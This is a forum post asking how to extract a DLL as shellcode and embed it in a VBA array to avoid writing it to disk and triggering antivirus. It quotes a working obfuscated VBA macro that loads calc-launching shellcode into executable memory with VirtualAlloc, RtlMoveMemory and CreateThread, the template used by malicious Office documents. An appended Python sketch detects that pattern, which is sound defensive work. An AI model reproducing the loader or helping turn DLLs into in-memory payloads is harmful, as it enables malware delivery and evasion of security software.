Extract SHELLCODE from my dll?

Hi all,

I have written a 64-bit C++ dll in Visual Studio Community 2017 and I am using it successfully in Excel/VBA.

Now, in order for the Client VBA application to use the dll, I have to distribute the dll file along with the VBA application, and the dll file has to be saved to the client's Disk.

This can pose a problem with some AV software as well as it affects the portability of the Client VBA application.

My idea is to be able to extract the shellcode from the dll and store this shellcode in a vba array within the client vba program itself so that the dll can be loaded directly from the vba array instead of being loaded in memory from the dll file on Disk.

I have seen this done like in the following vba code which stores calc.exe shellcode in an array and then runs calculator program on the fly.

Sub Afutfo_Open()
    Dim Wkbiqmw As Long, Hmbo As Variant, Rwvxs As Long, Xinzcm As Long, Abegogwui As Long
    Hmbo = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, _
139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, _
13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, _
116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, _
214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, _
36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, _
139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, _
235, 134, 93, 106, 1, 141, 133, 185, 0, 0, 0, 80, 104, 49, 139, 111, 135, 255, 213, 187, _
224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, _
187, 71, 19, 114, 111, 106, 0, 83, 255, 213, 99, 97, 108, 99, 0)
    Rwvxs = VirtualAlloc(0, UBound(Hmbo), &H1000, &H40)
    For Abegogwui = LBound(Hmbo) To UBound(Hmbo)
        Wkbiqmw = Hmbo(Abegogwui)
        Xinzcm = RtlMoveMemory(Rwvxs + Abegogwui, Wkbiqmw, 1)
    Next Abegogwui
    Xinzcm = CreateThread(0, 0, Rwvxs, 0, 0, 0)
End Sub



Does anybody have an idea how we can extract the dll shellcode so we can use it as explained above?

Thank you in advance.
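Added example, not part of the original post: the macro above combines a numeric byte array, a `VirtualAlloc` call with `&H40` (PAGE_EXECUTE_READWRITE), a byte-by-byte `RtlMoveMemory` copy and `CreateThread`, which is the combination macro scanners key on. The Python sketch below flags that combination in exported VBA source; the function names, the `MIN_BLOB` threshold and both sample macros are assumptions constructed for the illustration.

```python
import re

# Win32 calls that form the allocate / copy / run sequence in the posted macro
STAGES = {"alloc": "VirtualAlloc", "copy": "RtlMoveMemory", "exec": "CreateThread"}
PAGE_EXECUTE_READWRITE = 0x40  # the &H40 argument passed to VirtualAlloc in the post
MIN_BLOB = 32                  # assumed threshold; tune to your environment

def join_continuations(source):
    """Merge VBA lines split with a trailing ' _' so each statement is one line."""
    return re.sub(r"[ \t]_[ \t]*\r?\n[ \t]*", " ", source)

def byte_arrays(text):
    """Lengths of Array(...) literals whose items are all integers 0..255."""
    lengths = []
    for body in re.findall(r"\bArray\s*\(([^()]*)\)", text, re.I):
        items = [i.strip() for i in body.split(",")]
        if all(i.isdigit() and int(i) <= 255 for i in items):
            lengths.append(len(items))
    return lengths

def vba_int(token):
    """Parse a VBA decimal or &H hex literal; None if it is not a literal."""
    token = token.strip().rstrip("&")
    try:
        return int(token[2:], 16) if token.upper().startswith("&H") else int(token)
    except ValueError:
        return None

def analyze_macro(source):
    """Report which stages are present and whether the full pattern matches."""
    text = join_continuations(source)
    stages = sorted(k for k, api in STAGES.items() if re.search(rf"\b{api}\b", text, re.I))
    calls = re.findall(r"\bVirtualAlloc\s*\((.*)\)", text, re.I)
    rwx = any(vba_int(c.split(",")[-1]) == PAGE_EXECUTE_READWRITE for c in calls)
    blob = max(byte_arrays(text), default=0)
    return {"stages": stages, "rwx_alloc": rwx, "largest_byte_array": blob,
            "suspicious": len(stages) == 3 and rwx and blob >= MIN_BLOB}

# Constructed samples: filler bytes stand in for a payload; names are hypothetical
_A = ", ".join(str(n) for n in range(20))
_B = ", ".join(str(n) for n in range(20, 40))
SAMPLE = (f"Sub Demo()\n    buf = Array({_A}, _\n{_B})\n"
          "    addr = VirtualAlloc(0, UBound(buf), &H1000, &H40)\n"
          "    For i = LBound(buf) To UBound(buf)\n"
          "        r = RtlMoveMemory(addr + i, buf(i), 1)\n"
          "    Next i\n    r = CreateThread(0, 0, addr, 0, 0, 0)\nEnd Sub\n")
BENIGN = "Sub Totals()\n    q = Array(10, 20, 30)\n    MsgBox UBound(q)\nEnd Sub\n"

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, analyze_macro(src))
```

The check is purely textual, so it only covers macros that keep the API names and the byte array in plain source form.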